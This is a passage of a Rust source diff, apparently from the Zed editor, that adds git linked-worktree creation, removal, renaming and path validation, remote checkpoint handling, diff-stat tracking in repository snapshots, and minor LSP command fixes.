+ pub fn linked_worktree_path(&self) -> Option<&Arc> { + if self.work_directory_abs_path != self.original_repo_abs_path { + Some(&self.work_directory_abs_path) + } else { + None + } + } + + pub fn path_for_new_linked_worktree( + &self, + branch_name: &str, + worktree_directory_setting: &str, + ) -> Result { + let original_repo = self.original_repo_abs_path.clone(); + let project_name = original_repo + .file_name() + .ok_or_else(|| anyhow!("git repo must have a directory name"))?; + let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?; + Ok(directory.join(branch_name).join(project_name)) + } + pub fn worktrees(&mut self) -> oneshot::Receiver>> { let id = self.id; self.send_job(None, move |repo, _| async move { @@ -5634,28 +6004,222 @@ impl Repository { }) } + fn create_worktree_with_start_point( + &mut self, + start_point: CreateWorktreeStartPoint, + path: PathBuf, + commit: Option, + ) -> oneshot::Receiver> { + if matches!( + &start_point, + CreateWorktreeStartPoint::Branched { name } if name.is_empty() + ) { + let (sender, receiver) = oneshot::channel(); + sender + .send(Err(anyhow!("branch name cannot be empty"))) + .ok(); + return receiver; + } + + let id = self.id; + let message = match &start_point { + CreateWorktreeStartPoint::Detached => "git worktree add (detached)".into(), + CreateWorktreeStartPoint::Branched { name } => { + format!("git worktree add: {name}").into() + } + }; + + self.send_job(Some(message), move |repo, _cx| async move { + let branch_name = match start_point { + CreateWorktreeStartPoint::Detached => None, + CreateWorktreeStartPoint::Branched { name } => Some(name), + }; + let remote_name = branch_name.clone().unwrap_or_default(); + + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. 
}) => { + backend.create_worktree(branch_name, path, commit).await + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitCreateWorktree { + project_id: project_id.0, + repository_id: id.to_proto(), + name: remote_name, + directory: path.to_string_lossy().to_string(), + commit, + }) + .await?; + + Ok(()) + } + } + }) + } + pub fn create_worktree( &mut self, - name: String, - directory: PathBuf, + branch_name: String, + path: PathBuf, commit: Option, + ) -> oneshot::Receiver> { + self.create_worktree_with_start_point( + CreateWorktreeStartPoint::Branched { name: branch_name }, + path, + commit, + ) + } + + pub fn create_worktree_detached( + &mut self, + path: PathBuf, + commit: String, + ) -> oneshot::Receiver> { + self.create_worktree_with_start_point( + CreateWorktreeStartPoint::Detached, + path, + Some(commit), + ) + } + + pub fn head_sha(&mut self) -> oneshot::Receiver>> { + let id = self.id; + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + Ok(backend.head_sha().await) + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitGetHeadSha { + project_id: project_id.0, + repository_id: id.to_proto(), + }) + .await?; + + Ok(response.sha) + } + } + }) + } + + pub fn update_ref( + &mut self, + ref_name: String, + commit: String, + ) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.update_ref(ref_name, commit).await + } + RepositoryState::Remote(_) => { + anyhow::bail!("update_ref is not supported for remote repositories") + } + } + }) + } + + pub fn delete_ref(&mut self, ref_name: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. 
}) => { + backend.delete_ref(ref_name).await + } + RepositoryState::Remote(_) => { + anyhow::bail!("delete_ref is not supported for remote repositories") + } + } + }) + } + + pub fn resolve_commit(&mut self, sha: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + let results = backend.revparse_batch(vec![sha]).await?; + Ok(results.into_iter().next().flatten().is_some()) + } + RepositoryState::Remote(_) => { + anyhow::bail!("resolve_commit is not supported for remote repositories") + } + } + }) + } + + pub fn repair_worktrees(&mut self) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + backend.repair_worktrees().await + } + RepositoryState::Remote(_) => { + anyhow::bail!("repair_worktrees is not supported for remote repositories") + } + } + }) + } + + pub fn commit_exists(&mut self, sha: String) -> oneshot::Receiver> { + self.send_job(None, move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. }) => { + let results = backend.revparse_batch(vec![sha]).await?; + Ok(results.into_iter().next().flatten().is_some()) + } + RepositoryState::Remote(_) => { + anyhow::bail!("commit_exists is not supported for remote repositories") + } + } + }) + } + + pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver> { + let id = self.id; + self.send_job( + Some(format!("git worktree remove: {}", path.display()).into()), + move |repo, _cx| async move { + match repo { + RepositoryState::Local(LocalRepositoryState { backend, .. 
}) => { + backend.remove_worktree(path, force).await + } + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitRemoveWorktree { + project_id: project_id.0, + repository_id: id.to_proto(), + path: path.to_string_lossy().to_string(), + force, + }) + .await?; + + Ok(()) + } + } + }, + ) + } + + pub fn rename_worktree( + &mut self, + old_path: PathBuf, + new_path: PathBuf, ) -> oneshot::Receiver> { let id = self.id; self.send_job( - Some("git worktree add".into()), + Some(format!("git worktree move: {}", old_path.display()).into()), move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { - backend.create_worktree(name, directory, commit).await + backend.rename_worktree(old_path, new_path).await } RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { client - .request(proto::GitCreateWorktree { + .request(proto::GitRenameWorktree { project_id: project_id.0, repository_id: id.to_proto(), - name, - directory: directory.to_string_lossy().to_string(), - commit, + old_path: old_path.to_string_lossy().to_string(), + new_path: new_path.to_string_lossy().to_string(), }) .await?; @@ -5785,63 +6349,6 @@ impl Repository { }) } - /// Fetches per-line diff statistics (additions/deletions) via `git diff --numstat`. - pub fn diff_stat( - &mut self, - diff_type: DiffType, - _cx: &App, - ) -> oneshot::Receiver< - Result>, - > { - let id = self.id; - self.send_job(None, move |repo, _cx| async move { - match repo { - RepositoryState::Local(LocalRepositoryState { backend, .. 
}) => { - backend.diff_stat(diff_type).await - } - RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { - let (proto_diff_type, merge_base_ref) = match &diff_type { - DiffType::HeadToIndex => { - (proto::git_diff_stat::DiffType::HeadToIndex.into(), None) - } - DiffType::HeadToWorktree => { - (proto::git_diff_stat::DiffType::HeadToWorktree.into(), None) - } - DiffType::MergeBase { base_ref } => ( - proto::git_diff_stat::DiffType::MergeBase.into(), - Some(base_ref.to_string()), - ), - }; - let response = client - .request(proto::GitDiffStat { - project_id: project_id.0, - repository_id: id.to_proto(), - diff_type: proto_diff_type, - merge_base_ref, - }) - .await?; - - let stats = response - .entries - .into_iter() - .filter_map(|entry| { - let path = RepoPath::from_proto(&entry.path).log_err()?; - Some(( - path, - git::status::DiffStat { - added: entry.added, - deleted: entry.deleted, - }, - )) - }) - .collect(); - - Ok(stats) - } - } - }) - } - pub fn create_branch( &mut self, branch_name: String, @@ -5898,18 +6405,32 @@ impl Repository { ) } - pub fn delete_branch(&mut self, branch_name: String) -> oneshot::Receiver> { + pub fn delete_branch( + &mut self, + is_remote: bool, + branch_name: String, + ) -> oneshot::Receiver> { let id = self.id; self.send_job( - Some(format!("git branch -d {branch_name}").into()), + Some( + format!( + "git branch {} {}", + if is_remote { "-dr" } else { "-d" }, + branch_name + ) + .into(), + ), move |repo, _cx| async move { match repo { - RepositoryState::Local(state) => state.backend.delete_branch(branch_name).await, + RepositoryState::Local(state) => { + state.backend.delete_branch(is_remote, branch_name).await + } RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { client .request(proto::GitDeleteBranch { project_id: project_id.0, repository_id: id.to_proto(), + is_remote, branch_name, }) .await?; @@ -5975,12 +6496,24 @@ impl Repository { } pub fn checkpoint(&mut self) -> 
oneshot::Receiver> { - self.send_job(None, |repo, _cx| async move { + let id = self.id; + self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { backend.checkpoint().await } - RepositoryState::Remote(..) => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitCreateCheckpoint { + project_id: project_id.0, + repository_id: id.to_proto(), + }) + .await?; + + Ok(GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&response.commit_sha)?, + }) + } } }) } @@ -5989,12 +6522,22 @@ impl Repository { &mut self, checkpoint: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { backend.restore_checkpoint(checkpoint).await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + client + .request(proto::GitRestoreCheckpoint { + project_id: project_id.0, + repository_id: id.to_proto(), + commit_sha: checkpoint.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(()) + } } }) } @@ -6004,24 +6547,32 @@ impl Repository { update: proto::UpdateRepository, cx: &mut Context, ) -> Result<()> { - let conflicted_paths = TreeSet::from_ordered_entries( - update - .current_merge_conflicts - .into_iter() - .filter_map(|path| RepoPath::from_proto(&path).log_err()), - ); + if let Some(main_path) = &update.original_repo_abs_path { + self.snapshot.original_repo_abs_path = Path::new(main_path.as_str()).into(); + } + let new_branch = update.branch_summary.as_ref().map(proto_to_branch); let new_head_commit = update .head_commit_details .as_ref() .map(proto_to_commit_details); if self.snapshot.branch != new_branch || self.snapshot.head_commit != new_head_commit { - 
cx.emit(RepositoryEvent::BranchChanged) + cx.emit(RepositoryEvent::HeadChanged) } self.snapshot.branch = new_branch; self.snapshot.head_commit = new_head_commit; - self.snapshot.merge.conflicted_paths = conflicted_paths; + // We don't store any merge head state for downstream projects; the upstream + // will track it and we will just get the updated conflicts + let new_merge_heads = TreeMap::from_ordered_entries( + update + .current_merge_conflicts + .into_iter() + .filter_map(|path| Some((RepoPath::from_proto(&path).ok()?, vec![]))), + ); + let conflicts_changed = + self.snapshot.merge.merge_heads_by_conflicted_path != new_merge_heads; + self.snapshot.merge.merge_heads_by_conflicted_path = new_merge_heads; self.snapshot.merge.message = update.merge_message.map(SharedString::from); let new_stash_entries = GitStash { entries: update @@ -6034,6 +6585,15 @@ impl Repository { cx.emit(RepositoryEvent::StashEntriesChanged) } self.snapshot.stash_entries = new_stash_entries; + let new_linked_worktrees: Arc<[GitWorktree]> = update + .linked_worktrees + .iter() + .map(proto_to_worktree) + .collect(); + if *self.snapshot.linked_worktrees != *new_linked_worktrees { + cx.emit(RepositoryEvent::GitWorktreeListChanged); + } + self.snapshot.linked_worktrees = new_linked_worktrees; self.snapshot.remote_upstream_url = update.remote_upstream_url; self.snapshot.remote_origin_url = update.remote_origin_url; @@ -6054,10 +6614,11 @@ impl Repository { }), ) .collect::>(); - if !edits.is_empty() { + if conflicts_changed || !edits.is_empty() { cx.emit(RepositoryEvent::StatusesChanged); } self.snapshot.statuses_by_path.edit(edits, ()); + if update.is_last_update { self.snapshot.scan_id = update.scan_id; } @@ -6070,12 +6631,23 @@ impl Repository { left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. 
}) => { backend.compare_checkpoints(left, right).await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitCompareCheckpoints { + project_id: project_id.0, + repository_id: id.to_proto(), + left_commit_sha: left.commit_sha.as_bytes().to_vec(), + right_commit_sha: right.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(response.equal) + } } }) } @@ -6085,6 +6657,7 @@ impl Repository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> oneshot::Receiver> { + let id = self.id; self.send_job(None, move |repo, _cx| async move { match repo { RepositoryState::Local(LocalRepositoryState { backend, .. }) => { @@ -6092,7 +6665,17 @@ impl Repository { .diff_checkpoints(base_checkpoint, target_checkpoint) .await } - RepositoryState::Remote { .. } => anyhow::bail!("not implemented yet"), + RepositoryState::Remote(RemoteRepositoryState { project_id, client }) => { + let response = client + .request(proto::GitDiffCheckpoints { + project_id: project_id.0, + repository_id: id.to_proto(), + base_commit_sha: base_checkpoint.commit_sha.as_bytes().to_vec(), + target_commit_sha: target_checkpoint.commit_sha.as_bytes().to_vec(), + }) + .await?; + Ok(response.diff) + } } }) } @@ -6141,23 +6724,9 @@ impl Repository { let RepositoryState::Local(LocalRepositoryState { backend, .. 
}) = state else { bail!("not a local repository") }; - let (snapshot, events) = this - .update(&mut cx, |this, _| { - this.paths_needing_status_update.clear(); - compute_snapshot( - this.id, - this.work_directory_abs_path.clone(), - this.snapshot.clone(), - backend.clone(), - ) - }) - .await?; + let snapshot = compute_snapshot(this.clone(), backend.clone(), &mut cx).await?; this.update(&mut cx, |this, cx| { - this.snapshot = snapshot.clone(); this.clear_pending_ops(cx); - for event in events { - cx.emit(event); - } }); if let Some(updates_tx) = updates_tx { updates_tx @@ -6189,7 +6758,7 @@ impl Repository { let state = RepositoryState::Local(state); let mut jobs = VecDeque::new(); loop { - while let Ok(Some(next_job)) = job_rx.try_next() { + while let Ok(next_job) = job_rx.try_recv() { jobs.push_back(next_job); } @@ -6225,7 +6794,7 @@ impl Repository { let state = RepositoryState::Remote(state); let mut jobs = VecDeque::new(); loop { - while let Ok(Some(next_job)) = job_rx.try_next() { + while let Ok(next_job) = job_rx.try_recv() { jobs.push_back(next_job); } @@ -6373,22 +6942,43 @@ impl Repository { return Ok(()); } + let has_head = prev_snapshot.head_commit.is_some(); + let stash_entries = backend.stash_entries().await?; let changed_path_statuses = cx .background_spawn(async move { let mut changed_paths = changed_paths.into_iter().flatten().collect::>(); - let statuses = backend - .status(&changed_paths.iter().cloned().collect::>()) - .await?; + let changed_paths_vec = changed_paths.iter().cloned().collect::>(); + + let status_task = backend.status(&changed_paths_vec); + let diff_stat_future = if has_head { + backend.diff_stat(&changed_paths_vec) + } else { + future::ready(Ok(status::GitDiffStat { + entries: Arc::default(), + })) + .boxed() + }; + + let (statuses, diff_stats) = + futures::future::try_join(status_task, diff_stat_future).await?; + + let diff_stats: HashMap = + HashMap::from_iter(diff_stats.entries.into_iter().cloned()); + let mut 
changed_path_statuses = Vec::new(); let prev_statuses = prev_snapshot.statuses_by_path.clone(); let mut cursor = prev_statuses.cursor::(()); for (repo_path, status) in &*statuses.entries { + let current_diff_stat = diff_stats.get(repo_path).copied(); + changed_paths.remove(repo_path); if cursor.seek_forward(&PathTarget::Path(repo_path), Bias::Left) - && cursor.item().is_some_and(|entry| entry.status == *status) + && cursor.item().is_some_and(|entry| { + entry.status == *status && entry.diff_stat == current_diff_stat + }) { continue; } @@ -6396,6 +6986,7 @@ impl Repository { changed_path_statuses.push(Edit::Insert(StatusEntry { repo_path: repo_path.clone(), status: *status, + diff_stat: current_diff_stat, })); } let mut cursor = prev_statuses.cursor::(()); @@ -6516,6 +7107,120 @@ impl Repository { } } +/// If `path` is a git linked worktree checkout, resolves it to the main +/// repository's working directory path. Returns `None` if `path` is a normal +/// repository, not a git repo, or if resolution fails. +/// +/// Resolution works by: +/// 1. Reading the `.git` file to get the `gitdir:` pointer +/// 2. Following that to the worktree-specific git directory +/// 3. Reading the `commondir` file to find the shared `.git` directory +/// 4. 
Deriving the main repo's working directory from the common dir +pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option { + let dot_git = path.join(".git"); + let metadata = fs.metadata(&dot_git).await.ok()??; + if metadata.is_dir { + return None; // Normal repo, not a linked worktree + } + // It's a .git file — parse the gitdir: pointer + let content = fs.load(&dot_git).await.ok()?; + let gitdir_rel = content.strip_prefix("gitdir:")?.trim(); + let gitdir_abs = fs.canonicalize(&path.join(gitdir_rel)).await.ok()?; + // Read commondir to find the main .git directory + let commondir_content = fs.load(&gitdir_abs.join("commondir")).await.ok()?; + let common_dir = fs + .canonicalize(&gitdir_abs.join(commondir_content.trim())) + .await + .ok()?; + Some(git::repository::original_repo_path_from_common_dir( + &common_dir, + )) +} + +/// Validates that the resolved worktree directory is acceptable: +/// - The setting must not be an absolute path. +/// - The resolved path must be either a subdirectory of the working +/// directory or a subdirectory of its parent (i.e., a sibling). +/// +/// Returns `Ok(resolved_path)` or an error with a user-facing message. +pub fn worktrees_directory_for_repo( + original_repo_abs_path: &Path, + worktree_directory_setting: &str, +) -> Result { + // Check the original setting before trimming, since a path like "///" + // is absolute but becomes "" after stripping trailing separators. + // Also check for leading `/` or `\` explicitly, because on Windows + // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees` + // would slip through even though it's clearly not a relative path. 
+ if Path::new(worktree_directory_setting).is_absolute() + || worktree_directory_setting.starts_with('/') + || worktree_directory_setting.starts_with('\\') + { + anyhow::bail!( + "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}" + ); + } + + if worktree_directory_setting.is_empty() { + anyhow::bail!("git.worktree_directory must not be empty"); + } + + let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']); + if trimmed == ".." { + anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); + } + + let joined = original_repo_abs_path.join(trimmed); + let resolved = util::normalize_path(&joined); + let resolved = if resolved.starts_with(original_repo_abs_path) { + resolved + } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() { + resolved.join(repo_dir_name) + } else { + resolved + }; + + let parent = original_repo_abs_path + .parent() + .unwrap_or(original_repo_abs_path); + + if !resolved.starts_with(parent) { + anyhow::bail!( + "git.worktree_directory resolved to {resolved:?}, which is outside \ + the project root and its parent directory. It must resolve to a \ + subdirectory of {original_repo_abs_path:?} or a sibling of it." + ); + } + + Ok(resolved) +} + +/// Returns a short name for a linked worktree suitable for UI display +/// +/// Uses the main worktree path to come up with a short name that disambiguates +/// the linked worktree from the main worktree. +pub fn linked_worktree_short_name( + main_worktree_path: &Path, + linked_worktree_path: &Path, +) -> Option { + if main_worktree_path == linked_worktree_path { + return None; + } + + let project_name = main_worktree_path.file_name()?.to_str()?; + let directory_name = linked_worktree_path.file_name()?.to_str()?; + let name = if directory_name != project_name { + directory_name.to_string() + } else { + linked_worktree_path + .parent()? + .file_name()? + .to_str()? 
+ .to_string() + }; + Some(name.into()) +} + fn get_permalink_in_rust_registry_src( provider_registry: Arc, path: PathBuf, @@ -6679,16 +7384,22 @@ fn branch_to_proto(branch: &git::repository::Branch) -> proto::Branch { fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree { proto::Worktree { path: worktree.path.to_string_lossy().to_string(), - ref_name: worktree.ref_name.to_string(), + ref_name: worktree + .ref_name + .as_ref() + .map(|s| s.to_string()) + .unwrap_or_default(), sha: worktree.sha.to_string(), + is_main: worktree.is_main, } } fn proto_to_worktree(proto: &proto::Worktree) -> git::repository::Worktree { git::repository::Worktree { path: PathBuf::from(proto.path.clone()), - ref_name: proto.ref_name.clone().into(), + ref_name: Some(SharedString::from(&proto.ref_name)), sha: proto.sha.clone().into(), + is_main: proto.is_main, } } @@ -6744,71 +7455,174 @@ fn proto_to_commit_details(proto: &proto::GitCommitDetails) -> CommitDetails { } } +/// This snapshot computes the repository state on the foreground thread while +/// running the git commands on the background thread. We update branch, head, +/// remotes, and worktrees first so the UI can react sooner, then compute file +/// state and emit those events immediately after. 
async fn compute_snapshot( - id: RepositoryId, - work_directory_abs_path: Arc, - prev_snapshot: RepositorySnapshot, + this: Entity, backend: Arc, -) -> Result<(RepositorySnapshot, Vec)> { - let mut events = Vec::new(); - let branches = backend.branches().await?; - let branch = branches.into_iter().find(|branch| branch.is_head); - let statuses = backend - .status(&[RepoPath::from_rel_path( - &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(), - )]) + cx: &mut AsyncApp, +) -> Result { + let (id, work_directory_abs_path, prev_snapshot) = this.update(cx, |this, _| { + this.paths_needing_status_update.clear(); + ( + this.id, + this.work_directory_abs_path.clone(), + this.snapshot.clone(), + ) + }); + + let head_commit_future = { + let backend = backend.clone(); + async move { + Ok(match backend.head_sha().await { + Some(head_sha) => backend.show(head_sha).await.log_err(), + None => None, + }) + } + }; + let (branches, head_commit, all_worktrees) = cx + .background_spawn({ + let backend = backend.clone(); + async move { + futures::future::try_join3( + backend.branches(), + head_commit_future, + backend.worktrees(), + ) + .await + } + }) .await?; - let stash_entries = backend.stash_entries().await?; + let branch = branches.iter().find(|branch| branch.is_head).cloned(); + let branch_list: Arc<[Branch]> = branches.into(); + + let linked_worktrees: Arc<[GitWorktree]> = all_worktrees + .into_iter() + .filter(|wt| wt.path != *work_directory_abs_path) + .collect(); + + let (remote_origin_url, remote_upstream_url) = cx + .background_spawn({ + let backend = backend.clone(); + async move { + Ok::<_, anyhow::Error>( + futures::future::join( + backend.remote_url("origin"), + backend.remote_url("upstream"), + ) + .await, + ) + } + }) + .await?; + + let snapshot = this.update(cx, |this, cx| { + let head_changed = + branch != this.snapshot.branch || head_commit != this.snapshot.head_commit; + let branch_list_changed = *branch_list != *this.snapshot.branch_list; + let 
worktrees_changed = *linked_worktrees != *this.snapshot.linked_worktrees; + + this.snapshot = RepositorySnapshot { + id, + work_directory_abs_path, + branch, + branch_list: branch_list.clone(), + head_commit, + remote_origin_url, + remote_upstream_url, + linked_worktrees, + scan_id: prev_snapshot.scan_id + 1, + ..prev_snapshot + }; + + if head_changed { + cx.emit(RepositoryEvent::HeadChanged); + } + + if branch_list_changed { + cx.emit(RepositoryEvent::BranchListChanged); + } + + if worktrees_changed { + cx.emit(RepositoryEvent::GitWorktreeListChanged); + } + + this.snapshot.clone() + }); + + let (statuses, diff_stats, stash_entries) = cx + .background_spawn({ + let backend = backend.clone(); + let snapshot = snapshot.clone(); + async move { + let diff_stat_future: BoxFuture<'_, Result> = + if snapshot.head_commit.is_some() { + backend.diff_stat(&[]) + } else { + future::ready(Ok(status::GitDiffStat { + entries: Arc::default(), + })) + .boxed() + }; + futures::future::try_join3( + backend.status(&[RepoPath::from_rel_path( + &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(), + )]), + diff_stat_future, + backend.stash_entries(), + ) + .await + } + }) + .await?; + + let diff_stat_map: HashMap<&RepoPath, DiffStat> = + diff_stats.entries.iter().map(|(p, s)| (p, *s)).collect(); + let mut conflicted_paths = Vec::new(); let statuses_by_path = SumTree::from_iter( - statuses - .entries - .iter() - .map(|(repo_path, status)| StatusEntry { + statuses.entries.iter().map(|(repo_path, status)| { + if status.is_conflicted() { + conflicted_paths.push(repo_path.clone()); + } + StatusEntry { repo_path: repo_path.clone(), status: *status, - }), + diff_stat: diff_stat_map.get(repo_path).copied(), + } + }), (), ); - let (merge_details, merge_heads_changed) = - MergeDetails::load(&backend, &statuses_by_path, &prev_snapshot).await?; - log::debug!("new merge details (changed={merge_heads_changed:?}): {merge_details:?}"); - - if merge_heads_changed { - 
events.push(RepositoryEvent::MergeHeadsChanged); - } - if statuses_by_path != prev_snapshot.statuses_by_path { - events.push(RepositoryEvent::StatusesChanged) - } + let merge_details = cx + .background_spawn({ + let backend = backend.clone(); + let mut merge_details = snapshot.merge.clone(); + async move { + let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?; + Ok::<_, anyhow::Error>((merge_details, conflicts_changed)) + } + }) + .await?; + let (merge_details, conflicts_changed) = merge_details; + log::debug!("new merge details: {merge_details:?}"); - // Useful when branch is None in detached head state - let head_commit = match backend.head_sha().await { - Some(head_sha) => backend.show(head_sha).await.log_err(), - None => None, - }; + Ok(this.update(cx, |this, cx| { + if conflicts_changed || statuses_by_path != this.snapshot.statuses_by_path { + cx.emit(RepositoryEvent::StatusesChanged); + } + if stash_entries != this.snapshot.stash_entries { + cx.emit(RepositoryEvent::StashEntriesChanged); + } - if branch != prev_snapshot.branch || head_commit != prev_snapshot.head_commit { - events.push(RepositoryEvent::BranchChanged); - } - - let remote_origin_url = backend.remote_url("origin").await; - let remote_upstream_url = backend.remote_url("upstream").await; - - let snapshot = RepositorySnapshot { - id, - statuses_by_path, - work_directory_abs_path, - path_style: prev_snapshot.path_style, - scan_id: prev_snapshot.scan_id + 1, - branch, - head_commit, - merge: merge_details, - remote_origin_url, - remote_upstream_url, - stash_entries, - }; + this.snapshot.scan_id += 1; + this.snapshot.merge = merge_details; + this.snapshot.statuses_by_path = statuses_by_path; + this.snapshot.stash_entries = stash_entries; - Ok((snapshot, events)) + this.snapshot.clone() + })) } fn status_from_proto( diff --git a/crates/project/src/git_store/branch_diff.rs b/crates/project/src/git_store/branch_diff.rs index 
3b8324fce8ffea7049838aeac09e831463dbd34e..dc7c8bf647585d9fcf1d5f92e0e976f86939a781 100644 --- a/crates/project/src/git_store/branch_diff.rs +++ b/crates/project/src/git_store/branch_diff.rs @@ -70,7 +70,7 @@ impl BranchDiff { } GitStoreEvent::RepositoryUpdated( event_repo_id, - RepositoryEvent::StatusesChanged | RepositoryEvent::BranchChanged, + RepositoryEvent::StatusesChanged | RepositoryEvent::HeadChanged, _, ) => this .repo diff --git a/crates/project/src/image_store.rs b/crates/project/src/image_store.rs index 654fb0344db4b7dc581234a5b446e8ac4d2b10ab..0ba9787d2e4144cb529756b15fc05ff72dab83c8 100644 --- a/crates/project/src/image_store.rs +++ b/crates/project/src/image_store.rs @@ -808,7 +808,10 @@ impl LocalImageStore { let new_file = if let Some(entry) = snapshot_entry { worktree::File { disk_state: match entry.mtime { - Some(mtime) => DiskState::Present { mtime }, + Some(mtime) => DiskState::Present { + mtime, + size: entry.size, + }, None => old_file.disk_state, }, is_local: true, diff --git a/crates/project/src/lsp_command.rs b/crates/project/src/lsp_command.rs index bd94378433d7a8d992b913258999a6004b8031f2..d4a4f9b04968413c51607f71047752a9b779b79a 100644 --- a/crates/project/src/lsp_command.rs +++ b/crates/project/src/lsp_command.rs @@ -18,7 +18,7 @@ use gpui::{App, AsyncApp, Entity, SharedString, Task, prelude::FluentBuilder}; use language::{ Anchor, Bias, Buffer, BufferSnapshot, CachedLspAdapter, CharKind, CharScopeContext, OffsetRangeExt, PointUtf16, ToOffset, ToPointUtf16, Transaction, Unclipped, - language_settings::{InlayHintKind, LanguageSettings, language_settings}, + language_settings::{InlayHintKind, LanguageSettings}, point_from_lsp, point_to_lsp, proto::{ deserialize_anchor, deserialize_anchor_range, deserialize_version, serialize_anchor, @@ -533,7 +533,7 @@ impl LspCommand for PerformRename { .rename_provider .is_some_and(|capability| match capability { OneOf::Left(enabled) => enabled, - OneOf::Right(_options) => true, + OneOf::Right(_) => 
true, }) } @@ -2636,11 +2636,10 @@ impl LspCommand for GetCodeActions { relevant_diagnostics.push(entry.to_lsp_diagnostic_stub()?); } - let supported = - Self::supported_code_action_kinds(language_server.adapter_server_capabilities()); - let only = if let Some(requested) = &self.kinds { - if let Some(supported_kinds) = supported { + if let Some(supported_kinds) = + Self::supported_code_action_kinds(language_server.adapter_server_capabilities()) + { let filtered = requested .iter() .filter(|requested_kind| { @@ -2655,7 +2654,7 @@ impl LspCommand for GetCodeActions { Some(requested.clone()) } } else { - supported + None }; Ok(lsp::CodeActionParams { @@ -2937,9 +2936,7 @@ impl LspCommand for OnTypeFormatting { .await?; let options = buffer.update(&mut cx, |buffer, cx| { - lsp_formatting_options( - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx).as_ref(), - ) + lsp_formatting_options(LanguageSettings::for_buffer(buffer, cx).as_ref()) }); Ok(Self { @@ -3218,8 +3215,9 @@ impl InlayHints { Some(((uri, range), server_id)) => Some(( LanguageServerId(server_id as usize), lsp::Location { - uri: lsp::Uri::from_str(&uri) - .context("invalid uri in hint part {part:?}")?, + uri: lsp::Uri::from_str(&uri).with_context(|| { + format!("invalid uri in hint part {uri:?}") + })?, range: lsp::Range::new( point_to_lsp(PointUtf16::new( range.start.row, @@ -4857,9 +4855,14 @@ impl LspCommand for GetFoldingRanges { self, message: proto::GetFoldingRangesResponse, _: Entity, - _: Entity, - _: AsyncApp, + buffer: Entity, + mut cx: AsyncApp, ) -> Result { + buffer + .update(&mut cx, |buffer, _| { + buffer.wait_for_version(deserialize_version(&message.version)) + }) + .await?; message .ranges .into_iter() diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index ad3d4bdb703548f86304ac6c3892f3cabab01caa..2f579f5a724db143bbd4b0f9853a217bd6b14655 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -71,15 +71,14 @@ 
use http_client::HttpClient; use itertools::Itertools as _; use language::{ Bias, BinaryStatus, Buffer, BufferRow, BufferSnapshot, CachedLspAdapter, Capability, CodeLabel, - Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSourceKind, Diff, File as _, Language, - LanguageName, LanguageRegistry, LocalFile, LspAdapter, LspAdapterDelegate, LspInstaller, - ManifestDelegate, ManifestName, Patch, PointUtf16, TextBufferSnapshot, ToOffset, ToPointUtf16, - Toolchain, Transaction, Unclipped, + CodeLabelExt, Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSourceKind, Diff, + File as _, Language, LanguageName, LanguageRegistry, LocalFile, LspAdapter, LspAdapterDelegate, + LspInstaller, ManifestDelegate, ManifestName, ModelineSettings, OffsetUtf16, Patch, PointUtf16, + TextBufferSnapshot, ToOffset, ToOffsetUtf16, ToPointUtf16, Toolchain, Transaction, Unclipped, language_settings::{ AllLanguageSettings, FormatOnSave, Formatter, LanguageSettings, all_language_settings, - language_settings, }, - point_to_lsp, + modeline, point_to_lsp, proto::{ deserialize_anchor, deserialize_anchor_range, 